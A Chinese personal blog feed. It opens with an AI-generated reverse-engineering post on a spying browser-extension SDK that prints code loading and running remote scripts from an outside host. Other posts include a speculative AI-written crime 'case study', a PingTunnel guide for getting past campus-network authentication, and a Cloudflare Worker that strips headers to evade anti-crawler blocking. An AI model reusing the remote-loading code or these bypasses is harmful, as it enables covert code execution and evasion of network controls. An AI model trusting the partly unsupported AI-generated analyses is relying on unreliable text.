小盒子

【AI生成】影子控制：某恶意插件 SDK 动态下发与强制开关机制深度逆向

Mon, 16 Feb 2026 00:00:00 GMT

摘要

在对某手势类插件的 service_worker.js 进行审计时，我们发现了一套极其复杂的"云控"系统。该系统通过动态下发加密指令，能够绕过用户的本地配置，强制开启数据追踪。本文将深入代码底层，还原其加密算法与远程控制逻辑。

引言：伪装的艺术

在网络安全审计中，我们习惯于寻找 eval 或明文的 API 调用。然而，现代浏览器恶意 SDK 正在采用一种更隐蔽的策略——将自己伪装成合法的分析工具。该插件在代码中混杂了类似 Google Analytics 和 GrowthBook 的追踪模式，让安全审计人员误以为这只是常规的数据统计模块。

然而，在这些"合法外壳"之下，隐藏着一个名为 Yodules 的自研模块化引擎——它才是整个恶意系统的真正核心。不同于 Google Analytics 的透明上报或 GrowthBook 的功能开关管理，Yodules 的设计目标是远程控制与动态演进。

第一章：表象下的伏笔 —— 默认配置的陷阱

在插件初始化阶段，代码定义了一个看似无害的默认配置对象 t。

/**
 * 原始代码片段：初始配置
 * 目的：给用户和审核人员一种"隐私友好"的错觉
 */
const t = {
  analyticsInfo: { installedAt: 0, installVersion: "", version: "" },
  isGesturesOn: !0, // 手势功能默认开启
  cfgver: 4.1, // 配置版本
  others: { tuilink: !1 },
  optedin: !1, // 【重点】默认未加入数据收集
  optedout: !0, // 【重点】默认已退出数据收集
  // ... 后续为大量的手势UI配置
};

深度解析： 这里的 optedin: !1 是关键。当用户查看插件设置时，开关显示为关闭。但正如我们后续看到的，这个本地变量在"云端指令"面前毫无抵抗力。

第二章：核心中枢 —— Proconstantinator 模块

该扩展最核心的逻辑被封装在名为 AProconstantinatorBack 的模块中。它的职责是管理一个特殊的"常量池"，并负责与远程服务器同步。

2.1 强制同步逻辑

代码通过校验时间戳和 Hash 值，确保本地配置始终受到远程控制。

yodules.AProconstantinatorBack = {
  init: function () {
    const e = yodules.AProconstantinatorBack,
      // 硬编码的校验 Hash，用于识别合法的配置版本
      t = "e0675e083f6f6cbcb3a15786de5171588500b886d0c4c4b53d7153162f93d638";

    return (e.class = class {
      /**
       * 检查常量是否已加载且未过期
       * 逻辑：如果配置超过 24 小时（864e5ms），则判定为失效，强制重新拉取
       */
      checkConstantsLoaded() {
        return new Promise((resolve) => {
          chrome.storage.local.get(
            [
              "proconstantinator_key", // 存储的配置内容
              "proconstantinator_keyt", // 存储的时间戳（34进制）
              "proconstantinator_keyh", // 存储的校验Hash
            ],
            (res) => {
              // 如果 Hash 不匹配，直接判为失效
              res.proconstantinator_keyh !== t && resolve(!1);

              // 核心逻辑：Date.now() - 上次同步时间 < 24小时
              // 如果用户手动关闭了统计，但 24 小时后云端下发了开启指令，
              // 此处的判定失效会触发重新同步，进而覆盖用户设置。
              resolve(
                res.proconstantinator_key instanceof Object &&
                  Object.keys(res.proconstantinator_key).length &&
                  Date.now() - parseInt(res.proconstantinator_keyt, 34) < 864e5,
              );
            },
          );
        });
      }

      /**
       * 更新本地存储的云控配置
       */
      setConstants(data) {
        return new Promise((r) => {
          chrome.storage.local.set(
            {
              proconstantinator_key: data,
              proconstantinator_keyt: Date.now().toString(34), // 转换为34进制混淆
              proconstantinator_keyh: t,
            },
            r,
          );
        });
      }
    });
  },
};

第三章：模块化引擎 —— Yodules 架构

不同于传统的单体脚本，该 SDK 将所有功能解耦到 self.yodules 对象中。每个功能（如标签页追踪、云控、解密）都被定义为一个 Yodule。

3.1 Yodules 的注入机制

在源码头部，我们可以看到这种典型的模块依赖注入模式：

(self.yodules = self.yodules || {}),
  (yodules.Tablist = {
    init: function (e, t) {
      // e: 模块定义的 Class
      // t: 依赖的其他 Yodule 实例
      const r = yodules.Tablist;
      // ... 初始化逻辑
    },
  });

技术点评：这种设计模仿了现代前端框架（如 Angular 或 NestJS）的依赖注入。它的目的不是为了代码美观，而是为了动态替换。通过 Yodules 引擎，开发者可以在不修改主脚本的情况下，通过远程指令替换掉任何一个模块的 class 定义。

第四章：动态路径 —— `ms/gs` 的生成逻辑

SDK 不会直接暴露其抓取数据的具体逻辑，而是通过一个动态生成的 URL 来加载下一步的脚本。

/**
 * 逻辑推演：构建动态加载链接
 * 该链接通常指向 https://api.mousegesturesapi.com/ms/gs
 */
async loadRemoteScript() {
    const config = await this.getConstants(); // 获取第三章中解密的配置

    // 动态拼接参数，包含当前插件版本、ClientKey 以及随机时间戳
    const url = new URL(`https://${config.host}/ms/gs`);
    url.searchParams.append("v", config.version);
    url.searchParams.append("id", getBrowserId());

    // 使用 importScripts 动态加载并执行返回的 JS
    // 这种方式可以绕过 Web Store 的静态代码审核
    importScripts(url.toString());
}

第五章：对抗性分析 —— 为什么用户关不掉？

这是最令用户愤怒的部分。通过逆向 Toggler 模块，我们发现了"配置回滚"的逻辑：

心跳触发：插件每隔一段时间会向 api/features 发起心跳。
强制下发：如果服务器返回的配置中 force_optin 为 true。
覆盖写入：

// 伪代码：还原 Toggler 覆盖逻辑
if (remoteConfig.optedin !== localConfig.optedin) {
  chrome.storage.local.set({ optedin: remoteConfig.optedin });
  // 哪怕用户刚才点过关闭，这里也会被秒速改写回 true
}

隐蔽执行：由于这一过程发生在 service_worker 背景页，用户在前端 UI 上根本感知不到开关被自动拨动了。

第六章：反制建议

通过以上逆向分析，我们建议安全研究员和用户采取以下措施：

域名屏蔽：在 Hosts 或防火墙中将 api.mousegesturesapi.com 指向 127.0.0.1。这是阻断云控最直接的方式。
内容脚本过滤：监控 chrome.storage.local 的变动，特别是针对 proconstantinator_key 的写入操作。
流量分析：留意所有发往 /ms/gs 的 POST 请求，其中往往包含了用户浏览器的 URL 指纹。

结论

该扩展 SDK 的设计极具攻击性，其利用 AES 加密隧道、34 进制时间戳混淆 以及 24 小时循环强制对齐 机制，构建了一个难以关闭的后台监控系统。这再次提醒我们，浏览器插件的权限限制（如 storage 和 webRequest）在复杂的云控逻辑面前仍显脆弱。

被浏览器扩展给扒光了

Sun, 15 Feb 2026 00:00:00 GMT

插件还是“间谍”？从 crxMouse 偷跑数据谈浏览器扩展的安全重灾区

有点恐怖，前几年装的个鼠标手势扩展因为自己域名被 archive.org 爬才发现一直在后台偷偷上传数据

当初发现异常，是因为通过 Chrome 自带的网络抓包工具 chrome://net-export/ 监测到，在打开普通网页时出现了莫名的流量。

顺藤摸瓜排查下来，元凶正是 crxMouse在搞。

最恶心的地方是这东西还会静默推送配置你关掉了数据共享他偷偷直接云控帮你打开谢谢你

也许是巧合，不过确实找到了有这么一个流氓软件，稍微调查了一下，发现这些软件都和一家公司 Big Star Labs 搞的

Big Star Labs（全称 Big Star Labs LP）是一家因分发含有恶意行为的软件插件而备受争议的技术公司。该公司最知名的产品是浏览器扩展程序 Poper Blocker。

大规模监听：通过多款插件秘密窃取全球超过 1100 万用户的完整浏览历史及点击记录。

贼喊捉贼：利用 Poper Blocker 等“隐私保护”工具作为诱饵，实则行监控之实。

隐匿行踪：将隐私条款制作为图片以逃避引擎索引，并使用多个虚假开发者账号分发软件。

数据变现：疑似将高度私密的个人上网数据打包出售给类似 Similarweb 的数据情报公司获利。

去匿名化风险：虽然声称匿名，但其收集的详细路径和 ID 足以对用户进行精确的身份溯源。

脚本用 CrxViewer 反编译后，经常会出现出现 yodules (modules 的拼写变体) 和 proconstantinator (拖延，意味着会趁用户不注意悄悄打开数据收集)，仔细一想名字确实听讽刺的。

他们还用 Google Analytics 和 GrowthBook 进行多维度数据收集，这些数据跑到哪里是不知道了，大概估计我刷过的推和看过的 Github Repo 都被扒得一清二楚了（悲）

虽然不喜欢鼠标手势（感觉都是老一辈了再用），但因为 24 年那会 smartUp 被爆出来被植入后门，大概是因为强迫症想要再装个 alternative 结果又掉进了另一个坑里（~~坏习惯别学~~

现在谷歌扩展商店全都是垃圾了，搜索算法甚至没自己的谷歌好，一大堆商业化气息，独立开发者写的基本搜不到，现在尽是是下载量很高但是没啥评论的和下载量很少又没官网的，感觉咕鸽真就没把扩展放心上

现在又有人趁着 AI 发了一堆 malware 上去，盗取用户聊天记录：^1

找下来发现 52 破解的站长还开源了一个插件: FlowMouse ，现在还在维护，喜欢鼠标手势的可以去看看（个人当然没啥兴趣现在

即便 ClickFix，FileFix 和乱入的广告你能防住，下载了恶意扩展是 Adblock 都防不住的，所以还是要务必检查自己的浏览器有没有一些神秘小插件。

即便是在 2026 年，这种情况依然在进行，现在的 Chrome Webstore 恶意扩展，NPM 供应链投毒，VSCode 仍然非常狂。 ^2

PS

在查资料的时候还发现了个小项目，~~看标题都知道是啥https://github.com/classvsoftware/spy-extension/tree/master/src~~

偷偷 vibe 了个浏览器扩展审查工具，到时候发出来看看，可以先蹲一下 x ^3

拓展阅读:

https://github.com/qcontinuum1/spying-extensions/stargazers

https://github.com/HEXXDECIMAL/DISSECT

https://www.oakleys.org.uk/blog/2018/02/finding_the_privacy_leak_crxmouse

（btw 我也正在考虑试试跑在软路由的 DNS + 代理过滤方案）

【AI生成】晶体幻影：当硬件密钥成为地下王国的最后一道防线

Sun, 15 Feb 2026 00:00:00 GMT

在赛博空间的阴影里，传统的 Tor 匿名网络正因节点被渗透而失去统治力。一个名为 “The Keykeepers” 的跨国组织，正利用硬件物理安全与公网协议混淆，搭建起一座执法者无法触达的数字孤岛。

一、案件实录：代号“晶体幻影” (Writeup)

1. 初始线索：消失的流量

一切始于一次对门罗币（XMR）流向的追踪。技术人员发现，几名散布全球的可疑分子，其流量中频繁出现极短的 UDP 包（目标端口 443）。诡异的是，目标服务器 IP 在 Shodan 扫描中显示为“完全离线”。

2. 技术拆解：单包授权与硬件锚点

通过对捕获设备的内核级监控，我们复盘了这套“零信任”流程：

物理触发：成员插入定制的 HSM（硬件安全模块）。
SPA 敲门：利用 fwknop 发送一个经过硬件私钥签名的加密报文。服务器识别后，通过 iptables 为该 IP 开启 0.5 秒的临时入口。
寄生通信：连接建立后，数据被封装在 WebRTC（视频会议） 流量中。即便 ISP 拦截，也只以为目标在打视频电话。

3. 破局点：物理降维打击

由于数字层面近乎无懈可击，特工伪装成化学供应商与 Leader 会面。趁其离座，将一个微型**硬件拦截器（Hardware Implant）**串联在接口上。在 Leader 插入密钥建立合法隧道的瞬间，后门植入成功。

二、进化：超越互联网的犯罪手段

当“不信任”升级到极致，犯罪组织开始向物理学前沿跨越，跳出传统监管维度：

1. 私有无线电隐匿网 (SDR)

效仿墨西哥 Los Zetas 集团，利用 SDR（软件定义无线电） 技术在非授权频段跳频。这种方式彻底切断了与互联网的物理联系，实现“气隙隔离”级别的数据传输。

2. 生物特征“活体密钥”

Leader 不再发放 U 盘，而是发放一种算法。密钥碎片仅在成员特定生理状态下（如特定的心跳频率波动 + 虹膜特征）生成。一旦成员被捕，在压力下生理指标偏离，密钥将永久失效。

3. 神经网络隐写术 (Deep Steganography)

将交易指令物理级地融入高清图片的像素噪声中，发布在社交平台。看似平凡的风景照，其实是数亿美金的毒品订单。

三、黑客硬件与开源工具库

在这场攻防战中，以下开源工具是极客与安全专家的“瑞士军刀”：

类别	开源工具名称	功能描述
端口隐身	`fwknop`	实现单包授权 (SPA)，让服务器在公网隐身。
硬件调试	`Bus Pirate`	万能总线接口，用于提取硬件固件或与芯片对话。
协议分析	`Wireshark`	配合定制插件，解析非标的协议隧道。
无线电攻击	`GNU Radio`	配合 HackRF 硬件，操控和破解私有无线电信号。
物理模拟	`Flipper Zero`	集合 NFC/Sub-GHz/红外，模拟各种物理门禁与遥控。

四、深度反思：从不信任别人的人会被黑吗？

一个极度多疑、从不信任别人的人，往往会把自己变成单点故障 (Single Point of Failure)。

技术的孤岛效应：拒绝主流厂商的补丁，导致其自研工具在过时漏洞（N-day）面前整体坍塌。
物理安全错觉：越依赖物理隔离，一旦物理边界被渗透（如供应链污染），防御力瞬间归零。
谁来维护你的“锁”？：一个人无法精通从内核代码到芯片架构的所有环节。黑客只需攻击他唯一信任的那个“工具供应商”，就能实现“降维打击”。

总结： 安全不是一个产品，而是一个过程。当 Leader 以为公网是最好的掩护、密钥是最强的锁时，他忽略了：再强的锁，也防不住拿着钥匙的人被盯上。

OpenWRT旁路由IPV6解决方案【更新】

Fri, 06 Feb 2026 00:00:00 GMT

前言

之前配置的 OpenWRT 重置配置过后就又连不上 IPV6 了，又看了一遍自己写的笔记发现能获取到 IPV6，但是 ping 任何网站都显示为超时...

之前折腾了好一会，最后还是问 <ruby>双子座<rp><rt>Gemini</rt></rp></ruby> (之前玩谷歌娘机翻看到的)

网络拓扑

光猫 (192.168.1.1) [主路由，DHCPv4+DHCPv6下发]
       │
       │ WAN 口
       ▼
AX3000T OpenWRT (192.168.1.254 / 192.168.2.1) [旁路由]
       │
       │ LAN 口
       ▼
    客户端

网络配置

WAN 口配置（获取 IPv4）

进入 网络 → 接口 → WAN：

协议：DHCP 客户端
高级设置：关闭「使用默认网关」（由光猫提供）

WAN6 配置（获取 IPv6 前缀）

进入 网络 → 接口 → WAN6：

协议：DHCPv6 客户端
请求 IPv6 地址：try
请求 IPv6 前缀：auto
重启不发送 Release：勾选
高级设置：关闭「使用默认网关」

LAN 口配置（关键避坑）

进入 网络 → 接口 → LAN：

基本设置

协议：静态地址
IPv4 地址：192.168.2.1
子网掩码：255.255.255.0
IPv4 网关：192.168.1.1（光猫地址）
DNS：按需填写（如果要自定义 DNS 或者配置过滤）

高级设置

IPv6 ULA 前缀：清空（只用公网 IPv6）
桥接接口：关闭

DHCP 服务器 → IPv6 设置

配置项	推荐值
路由通告服务（RA）	服务器模式
DHCPv6 服务	服务器模式
NDP 代理	已禁用
ULA 前缀	清空

为什么用服务器模式？ 旧教程推荐的「中继模式」在 90% 的家庭光猫中不兼容，因为大多数光猫不支持跨设备中继 DHCPv6/RA。服务器模式下，AX3000T 直接分配公网 IPv6 地址，稳定性更高。

执行配置

下面脚本在服务器终端执行：

# 1. 清除可能残留的旧中继配置
uci delete dhcp.lan.ra 2>/dev/null
uci delete dhcp.lan.dhcpv6 2>/dev/null
uci delete dhcp.lan.ndp 2>/dev/null
uci delete dhcp.lan.master 2>/dev/null
uci delete dhcp.lan.ula_prefix 2>/dev/null

# 2. 配置 LAN 为 IPv6 服务器模式
uci set dhcp.lan.ra='server'
uci set dhcp.lan.dhcpv6='server'
uci set dhcp.lan.ndp='disabled'
uci set dhcp.lan.ra_management='1'

# 3. 配置 WAN6 获取公网前缀
uci set network.wan6.proto='dhcpv6'
uci set network.wan6.reqaddress='try'
uci set network.wan6.reqprefix='56'
uci set network.wan6.norelease='1'

# 4. 提交并重启
uci commit dhcp
uci commit network
/etc/init.d/network restart
/etc/init.d/odhcpd restart

验证 IPv6 获取

# Windows PowerShell
ipconfig /all

# 应看到类似输出：
# IPv6 地址 . . . . . . . . . . . . : 240e:38a:....
# 临时 IPv6 地址. . . . . . . . . . : 240e:38a:....
# 默认网关. . . . . . . . . . . . . : fe80::ced8:....

# 测试 IPv6 DNS 连通性
ping -6 2400:3200::1

# 追踪路由
tracert -6 2400:3200::1

# 测试 HTTPS 访问
curl -6 https://www.baidu.com

tracert 结果解读：

跃点	结果	说明
第 1 跳	1ms 通	OpenWRT IPv6 转发正常 ✅
第 2-4 跳	超时	运营商屏蔽 ICMPv6（正常）
第 5+ 跳	正常响应	IPv6 链路通畅 ✅

官方测试网站

访问 test-ipv6.com：

关闭 VPN/代理
评分 ≥9/10 = IPv6 完全可用
评分 <7/10 = 配置有问题

240e 开头 = 即为公网 IPv6

公网访问

为了发挥出 IPV6 最大的优势，就是免费公网 IP！

配置

首先进入 网络 → 防火墙，并配置下面设置：

常规设置转发 -- 允许（让内网 IP 能通过路由器访问，否则即便获取到公网 IP 也是访问不到的）

:::important 务必确认自己的防火墙配置已经完善，不要让自己设备的所有端口都裸奔！（特别是 Windows 那一大堆程序）该设密码的地方都已经设好！ :::
区域设置

区域绑定的网络转发

wan wan, wan6 接受

区域	绑定的网络	转发
wan	wan, wan6	接受

DDNS

因为公网 IP 基本都是运营商动态分配的， SSL 证书，建站什么的都需要配置动态域名。

如果是给 OpenWRT 配置，在 服务 -> DDNS-GO 中按照步骤配置即可。

如果是给自己的 NAS 或者 Windows 配置，可以配合 https://github.com/jeessy2/ddns-go 实现自动化。

现在在自己的绿联 NAS 装了个 Caddy Server 给跑在上面的服务做反向代理，到时候愿意折腾甚至可以跑个 Dokploy, Coolify 或者 1Panel 玩玩，最近还是太累了啊

如何用 PingTunnel 绕过校园网限制

Mon, 19 Jan 2026 19:20:43 GMT

前言

因为我们学校之前因为一些原因导致校园网被加上了网关认证，虽然有时候能直连上外边但极其不稳定。（而且也没发现蹦不蹦出来认证的规律）

那么问题来了，如何在不认证的情况下去访问外网呢？

有一次我测试自己是否能 ping 通服务器时，发现正常获取到了服务器的 IP 地址。也就是说，校园网的防火墙并没有封掉 ICMP 和 DNS 协议。

在许多校园网环境下，虽然你可能还没登录认证系统，或者 TCP/UDP 流量被拦截，但系统往往会允许 ICMP (Ping) 和 DNS 的报文通过，以便进行基础的网络诊断。PingTunnel 正是利用这一点，将你的网络流量封装在 Ping 包中进行传输，从而“骗”过网关的审查。

之前也试过 iodine，作为一款开源 DNS 隧道工具，本人在尝试的时候发现可以连上，服务器端也能正常握手，但是 TAP 驱动死活是连不上 (应该是这个 issue: https://github.com/yarrick/iodine/issues/102) iodine 虽然支持 raw 隧道，但是假如 raw 的包被拦截，速度差不多就会降到几十 KB/s，所以体验会很差

一台服务器： 需拥有公网 IP，且该 IP 能够被校园网 Ping 通。
PingTunnel： 在服务器和本地电脑上分别下载对应系统的二进制文件。
代理工具： 本文以 Tinyproxy（服务端）和浏览器插件（客户端）为例。

:::note 注意：本文并不是翻墙教程，本方案的性能也可能因为 ICMP 性能限制导致开网页慢得像蜗牛

本文仅作研究性分享，请勿用作不当用途，遵守校园网管理规定。 :::

1. 服务端配置 (VPS)

首先，我们需要在服务器上运行服务端，并设置访问 key 保证隧道的基本安全。

启动 PingTunnel 服务端： 使用 -key 参数设置验证密钥：

sudo ./pingtunnel -type server -key 114514

部署 HTTP 代理服务： 安装 Tinyproxy 并设置其监听在 8888 端口：

# 安装 (以 Ubuntu 为例)
sudo apt install tinyproxy -y
# 修改配置允许本地连接
vi /etc/tinyproxy/tinyproxy.conf # 确保 Allow 127.0.0.1 未被注释
sudo service tinyproxy restart

2. 本地客户端配置

由于校园内经常装的是希沃白板系统，故接下来用 Windows 来演示。

:::note 注意：在 Windows 上运行需要以“管理员身份”打开 CMD/PowerShell。 :::

# -type client: 客户端模式
# -l :1080: 本地监听 1080 端口
# -s: 你的 VPS 公网 IP / 域名
# -t: 目标指向 VPS 本地的代理端口 (8888) (是VPS的而不是电脑的！)
# -key: 必须与服务端一致
# -tcp 1: 开启 TCP 转发
pingtunnel.exe -type client -l :1080 -s [你的VPS_IP] -t 127.0.0.1:8888 -tcp 1 -key 114514

3. 浏览器设置与测试

现在，你的本地 1080 端口就是一个通往校外世界的“入口”了。

下面有两种方法设置系统代理：

设置浏览器代理： 使用 ProxySwitchyOmega 插件或系统自带代理设置，添加一个 HTTP 代理：

代理服务器： 127.0.0.1
端口： 1080

设置系统代理 通过 Windows 设置中的“代理”选项，启用手动代理设置，填写同样的信息。

此时，即使你没有在校园网弹窗中登录账号，只要能 Ping 通服务器，浏览器应该就能正常访问网页了。

可能需要注意的点 💡

禁用系统 Ping 响应： 为了让隧道更稳定，建议在服务器上运行： echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all 这能防止内核干扰 PingTunnel 处理 ICMP 包。（AI 生成的建议，但本人目前不需要操作）
关于 -key 参数： 这是一个非常简易的鉴权，主要作用是防止扫描器乱入，务必保证两端一致。如果你把服务器设在海外，估计 GFW 直接一条龙（
速度与稳定性： ICMP 并不是为大数据量设计的，因此延迟（Ping 值）会比直连高很多。
防火墙设置： 确保服务器的防火墙允许 ICMP 流量通过。

在 Cloudflare Workers 上部署 Bitwarden

Sun, 11 Jan 2026 00:00:00 GMT

前言

之前我的 Vaultwarden 实例是运行在自己的 NAS 上的，因为公网 IP 变得越来越不好搞了，用的 FRP 内网穿透国外节点的延迟大，运气差一点根本用不了，国内的又需要备案（就是那种不肯备案的人），我便想到了在云服务器上跑服务器 + 用带善人 Cloudflare 的数据库作同步的方案。但别急！随手查了一下，发现已经有佬写了 Workers 的版本

Serverless 的时代，来临力！（喜

原文：https://www.nodeseek.com/post-575140-2

部署教程

:::tip 关于数据备份的内容可以去看原文，下面只包含了关键步骤（部分 AI 生成） :::

:::warning

本项目不是 Vaultwarden 的兼容层，不保证安全性跟 Vaultwarden 持平
本项目不提供设备管理功能
如果发现安全性问题，请在 Github 中提交安全报告
数据安全建议：使用不同的 Cloudflare 账户进行备份，避免单点故障

:::

1. 设置 Github 项目

Fork 项目仓库：https://github.com/qaz741wsd856/warden-worker
进入 Action 页面，启用 Action
点击 settings → Secrets and variables → Actions，准备添加 Repository secrets
需要添加三个 secrets：

获取并添加 secrets

CLOUDFLARE_ACCOUNT_ID：
- 进入 Cloudflare 控制台：https://dash.cloudflare.com/
- 在浏览器地址栏中复制你的 account id
- 在 Github 中添加为 CLOUDFLARE_ACCOUNT_ID
CLOUDFLARE_API_TOKEN：
- 访问 https://dash.cloudflare.com/profile/api-tokens
- 选择编辑 Worker 的模板
- 添加 D1 的编辑权限
- 创建 API 令牌
- 在 Github 中添加为 CLOUDFLARE_API_TOKEN
D1_DATABASE_ID：
- 进入 Cloudflare 控制台的存储与数据库 → D1 sql 数据库
- 创建一个数据库
- 复制它的 id
- 在 Github 中添加为 D1_DATABASE_ID

2. 部署到 Cloudflare

此时点击上方的 Actions 选项卡，选择 Build 工作流点运行

Github Actions 会自动在数据库为空时建表，无需手动建表

配置环境变量与自定义域名

当 Github Action 执行完毕后，在 CF 的 Workers 中找到 warden-worker
进入 Worker 的设置页面，在变量和机密栏添加以下三个密钥，在设置完变量后会自动重新部署，Github 无需额外再运行一遍：

名称	说明
`ALLOWED_EMAILS`	允许注册的完整邮箱（支持通配符），用逗号分隔（例：your-name@example.com,*@xxx.com），建议只填你自己的邮箱
`JWT_SECRET`	随机长字符串（32 字节以上）
`JWT_REFRESH_SECRET`	随机长字符串（32 字节以上）

可选环境变量

DISABLE_USER_REGISTRATION：控制是否显示注册按钮，默认为 true
IMPORT_BATCH_SIZE：导入密码库时每次批操作的数据条数，默认为 30
PASSWORD_ITERATIONS：服务端 PBKDF2 迭代次数，默认 600000，最小 600000
TRASH_AUTO_DELETE_DAYS：回收站中的项目清理天数，默认为 30，0 代表永不清理
AUTHENTICATOR_DISABLE_TIME_DRIFT：控制是否允许 TOTP 的时间 ±1 偏移，默认为 true
ATTACHMENT_MAX_BYTES：单个附件的大小限制，单位字节，默认不限制
ATTACHMENT_TOTAL_LIMIT_KB：单个用户的总附件大小限制，单位 KB，默认不限制
ATTACHMENT_TTL_SECS：附件的上传下载链接的有效时间，默认五分钟

在域和路由中添加自己的域名，测试网页是否能打开
建议去域名配置页的安全性 → 安全规则里给 /identity/* 和 /api/accounts/* 添加速率限制规则（到时候请求被刷爆就没了）

4. 创建账户并导入数据

如果已有 bitwarden 库，在电脑上把它导出为 JSON
前端默认隐藏了注册按钮，可以：
- 参考上一步的环境变量开启然后清空缓存
- 直接访问 https://你的域名/#/register 注册

注意：创建账户时用的密码必须记住，没有任何方式能找回

DIY 短信转发模块

Sat, 20 Dec 2025 00:00:00 GMT

之前刷到个 DIY 转发 ESP32 转发短信的项目，功耗也特别低，搞的 giffgaff 卡也因为主播就一台机子~~被插满了~~，现在就整台玩一玩

::github{repo="chenxuuu/sms_forwarding"}

教程视频：https://www.bilibili.com/video/BV1cSmABYEiX

刷前准备

准备原材料：

硬件设备：ESP32C3 Super Mini + ML307R-DC 开发板 + 4G FPC 天线（结果发现还没包邮
焊接工具 + 面包板
杜邦线（或者是跳线）

焊接开发板的时候千万不要直接把 ESP 直接叠上去！！！！！ 在 ESP 的 GND 右边还有一个 3.3V 的引脚，没有想到更好的办法，只好用杜邦线连接起来（或者插在面包板上），这么丑就是没办法（摊手）

视频直接把焊在模块上的直接掰弯引脚给接开发板上去了（然后疯狂囤板子 x）

这次买的是 ESP32-C3 的 Supermini，因为没有写入固件，会不断重启，导致刷入永远失败，所以需要让 ESP 进入串口 Bootloader 模式.

根据 Reddit ~~国际版贴吧 x~~，可通过将 GPIO9 拉低，来进入 Bootloader 模式，或者不短接 GPIO9，同时按下 BOOT 和 RST 按钮，随后松开 RST 按钮，即可进入 Bootloader 模式，这时可直接松开 BOOT 按钮。^1

然后用 Arduino IDE 打开项目工程文件，下载所需的库与工具链^2。

最后 ESP32 的工具链装在用户目录下又吃了我 C 盘 3G 多空间 😭

启动！

准备完成后，打开wifi_config.h文件，配置 WiFi 信息（需选用 2.4G 网络），编译并上传到开发板。

上传成功后打开串口监视器，里面就是我们控制面板的地址

ESP-ROM:esp32c3-api1-20210207
配置已加载
连接wifi
<WiFi名称>
wifi已连接
IP地址: 192.168.X.X
正在同步NTP时间...
NTP时间同步失败，将使用设备时间
HTTP服务器已启动
模组AT响应正常
CNMI参数设置完成
PDU模式设置完成
CGATT已附着
⚠️ 请访问 http://192.168.2.145/ 配置系统参数
Debug> OK

其他配置

若要配置邮箱通知，可以加上 SMTP 服务器的相关配置

从 Nuxt 迁移到 Astro

Sat, 22 Nov 2025 00:00:00 GMT

今天一下午把自己的主页用 Astro+Svelte 重构了一下，就想稍微阐释一下自己迁移的原因。

Astro, Yes!

下面是摘自官网astro.build的介绍

什么是 Astro？ Astro 是一个专为构建快速、内容驱动型网站而优化的 JavaScript Web 框架。

服务端优先 Astro 通过在服务器端渲染组件来提升网站性能，向浏览器发送轻量级的 HTML，无需任何不必要的 JavaScript 开销。

内容驱动 Astro 旨在与您的内容无缝协作，无论内容存储在哪里。可以从文件系统、外部 API 或您喜欢的 CMS 加载数据。

高度可定制 使用您喜爱的工具扩展 Astro。可以引入自己的 JavaScript UI 组件、CSS 库、主题、集成等更多功能。

对于友链的网站图标加载 Astro 也有做优化，因为目前的友链图片全是第三方加载，朋友的网站的图片加载速度都没做过优化（被墙的甚至直接加载不出来），可能导致加载开屏卡很久

现在用通过<Image>组件在编译时就会将图标预加载并且缓存到本地，削除了前端从不同网站加载图标而且分辨率不统一导致的加载卡慢的问题

途中因为我直接把新的分支 push 到老项目的 branch 里了，造成了多分支保护规则 (见https://github.com/withastro/docs/issues/1376)，直接导致 workflow failure，要我们将 Environments里的分支保护规则加上咱新的分支或者设置为全部即可

Astro + Svelte

Astro + Svelte 对于规模不大的像我们这种个人首页就挺合适感觉，功能上基本的东西都有

对于客户端渲染的响应式组件，Astro 的孤岛架构保证了只会在需要的时候才会加载组件，也是像我从别的框架或者开发 SPA 的人比较容易犯错的地方

:::important 对于要在客户端渲染的组件须经历水合 (hydration，也叫做水化，注水) 过程，将干巴巴的 HTML 转换为交互式的组件，才能在浏览器中渲染出交互效果各大主流 SSR 框架都支持水合过程，包括 Nuxt、Next.js、Vue SSR 等，这样对一些静态站点来说，也能获得不错的性能提升，同时还能提升 SEO 效果 :::

+1, Svelte 在客户端 JS 体积上也比 vue 小很多，即使你的站点部署在 Gtihub Pages 上或者套了 Cloudflare 减速器(x) 也能获得极快的加载速度

:::tip PS：本站的博客主题也是基于 Astro + Svelte 写的，看看Fuwari！ :::

为什么 Nuxt 拉了？

因为我现代前端接触的第一个框架是 vue，再加上对于 Nuxt 和 Vue 与渲染机制的不理解，那时候还迷迷糊糊地就选用 Nuxt 了

Nuxt 本身作为一个全栈开发框架，主要注重服务端与客户端的一个 monolith 架构，对于一个静态为主的个人站说，可以说是大炮打蚊子

每次用 vue 都要打包一个运行时进去，导致最终的包体积很大，而 Astro 则是在编译时就会将组件编译为静态 HTML，不会有运行时的依赖，最终的包体积也会小很多

未来的计划

准备在之后将继续写个人主页，随便换点设计也不是不行（）

~~到时候条件允许直接迁移上云~~

如何通过CF反代API绕过B站视频CORS限制并在首页展示最新视频

Wed, 20 Aug 2025 00:00:00 GMT

最近继续写前端练手

又在翻别人主页的时候看到了一些活，懒得搞灵感记录（这是坏的！不要学我把一整天全窝在电脑前）

准备学学某人（ta 是 youtube）的博客在主页上展示自己的 B 站最新视频，同时让自己的主页更加有高级感（疯狂引流 x

B 站 API

现在对 B 站 API 的研究也算比较成熟，易姐的 Bilibili API Collect 够用，不多说

众所周知，B 站是有做反爬的——

...

处理 CORS

由于浏览器安全限制，直接请求 B 站 API 会被 CORS 拦截（而且所有默认不带Access-Control-Allow-Origin的你服务器返回个 200 浏览器最后也会拒绝处理

这篇文章具体写了用怎么用 CF Workers 绕过跨域请求

:::tip 不会用 CF 文章里有详细部署教程，如果你已经知道怎么搭建，这一步可以跳过 :::

:::note Workers 免费版每个月有100000次请求限制，超过就会停用，而且搞反向代理有概率号会炸连带绑定的域名（墙倒是不怎么担心 :::

Workers 的限制

现在已经成功代理，其他网站可以正常访问，但是发现访问 API 时 B 站直接返回 412

通过查看 Request Catcher 和 httpbin 发现，CF 的 fetch 会在请求头里下毒，同时找到了这篇文章

具体来说，Cloudflare 的 fetch API 会自动且强制地在所有出站请求中加入一些无法被过滤掉的 CF-* 请求头，例如：

cf-connecting-ip：暴露发起请求用户的真实 IP 地址。

cf-ipcountry：暴露用户所在的国家/地区。

cf-worker：明确标识该请求经过了 Cloudflare Workers

应该是是动了这些手脚被防火墙检测后拦截了，所以需要找到办法去掉这些头，而恰巧这里用 CF 的socket api 就能自由的去发送 HTTP 请求，同时绕过系统的一些拦截限制，差不多就是个越狱版

因为原本的脚本不具备绕过 CORS 的能力，故需要手动修改请求头

class ShadowProxy {
  static async handleRequest(req, env, ctx) {
    try {
      // ... 原有代码

      // 复刻请求头
      const req2 = new Request(req.url, {
        headers: req.headers,
        method: req.method,
        body: req.body,
        redirect: "follow",
      });

      // 处理特殊头部规则
      const specialCases = {
